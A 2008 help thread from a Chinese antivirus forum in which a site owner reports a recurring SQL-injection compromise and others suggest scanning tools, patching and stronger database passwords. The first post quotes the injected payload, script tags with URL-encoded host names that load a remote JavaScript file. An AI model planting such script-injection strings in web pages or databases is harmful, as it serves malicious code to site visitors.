求救，SQL注入攻击 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛求救，SQL注入攻击

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十六次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

[求助] 求救，SQL注入攻击

本主题由在线技术支持工程师瑞星工程师19 于 2008-12-4 20:27:33 执行移动主题操作

xiang730988 初生襁褓狮帖子:6 注册: 2008-12-04 来自:	发表于： 2008-12-04 20:23 \| 只看楼主短消息资料字号：小中大 1楼求救，SQL注入攻击具体表现为: 网站数据库的数据表的用户信息后面被写入"！<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>" 删除了其代码又自动生成... 最新特征： 1、用户发布新信息内容后在5个小时左右，在数据表的相关字段写入“<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script>“ 2、删除代码后第一次在用户信息内容里被写入的是"</Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>"过几个小时后写入两段就成“<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script>”再过几个小时后写入3段就成“.<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script><Script Src=http://c.%6E%75clear3.com/css/c.js></Script><Script Src=http://c.nucl%65%61r3.com/css/c.js></Script>” 例子网站: 华派信息网(http://www.hp5e.com) 望专家尽快作出解决方案,以免更多网站受其害! 用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322) xiang730988 最后编辑于 2008-12-05 17:08:13
xiang730988 初生襁褓狮帖子:6 注册: 2008-12-04 来自:	分享到：

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2008-12-04 20:28 \| 短消息资料字号：小中大 2楼回复：求救!SQL注入攻击使用System Repair Engineer扫描日志，将日志作为附件上传上来。下载页面：http://www.kztechs.com/sreng/download.html 操作方法： 1、下载后解压缩，运行SREngPS.EXE； 2、如果无法打开尝试把SREngPS.EXE改名为123.com，并复制到c:\windows目录下运行； 3、依次点击【智能扫描】-【扫描】，耐心等待，扫描结束后点击【保存报告】； 4、选择保存路径，文件名保持默认，直接点击【保存】； 5、打开保存的日志文件SREngLOG.log，完整复制全部内容，新建一个文本文档，将日志中的全部内容粘贴到“新建文本文档.txt”中； 6、将“新建文本文档.txt”作为附件上传，同时务必详细描述问题现象，如果有查杀不净的病毒务必提供病毒名和路径。注意：扫描前请尽量关闭QQ、游戏、下载工具、媒体播放器等应用程序
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

xiang730988 初生襁褓狮帖子:6 注册: 2008-12-04 来自:	发表于： 2008-12-04 20:40 \| 只看楼主短消息资料字号：小中大 3楼回复：求救!SQL注入攻击问题是:数据库在虚拟空间上!
xiang730988 初生襁褓狮帖子:6 注册: 2008-12-04 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2008-12-04 20:53 \| 短消息资料字号：小中大 4楼回复：求救!SQL注入攻击有可能是有arp攻击了，打全系统补丁，设置强壮的sa密码。安装arp防火墙。让提供虚拟空间的管理人员查看一下。sql注入多半和系统补丁包括第三方应用程序软件有漏洞，补丁未打全有关。
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

helpme2008 初生襁褓狮帖子:4 注册: 2008-12-04 来自:	发表于： 2008-12-05 07:29 \| 短消息资料字号：小中大 5楼回复 1F xiang730988 的帖子我也同样被攻击，还没解决，加我的QQ：564341701
helpme2008 初生襁褓狮帖子:4 注册: 2008-12-04 来自:

xiang730988 初生襁褓狮帖子:6 注册: 2008-12-04 来自:	发表于： 2008-12-05 13:36 \| 只看楼主短消息资料字号：小中大 6楼回复：求救!SQL注入攻击大家一起来解决吧！
xiang730988 初生襁褓狮帖子:6 注册: 2008-12-04 来自:

xiang730988 初生襁褓狮帖子:6 注册: 2008-12-04 来自:	发表于： 2008-12-05 21:23 \| 只看楼主短消息资料字号：小中大 7楼回复：求救，SQL注入攻击没有大侠站出来呀！
xiang730988 初生襁褓狮帖子:6 注册: 2008-12-04 来自:

aaccbbdd 卡卡巡查帖子:45933 注册: 2007-11-17 来自:蜀山仙剑派	发表于： 2008-12-05 21:25 \| 短消息资料字号：小中大 8楼回复：求救，SQL注入攻击数据库漏洞自己排查下同时按照2楼方法提供日志
aaccbbdd 卡卡巡查帖子:45933 注册: 2007-11-17 来自:蜀山仙剑派

天下先初生襁褓狮帖子:1 注册: 2008-12-09 来自:	发表于： 2008-12-09 09:33 \| 短消息资料字号：小中大 9楼回复：求救，SQL注入攻击在哪里上传日志文件
天下先初生襁褓狮帖子:1 注册: 2008-12-09 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT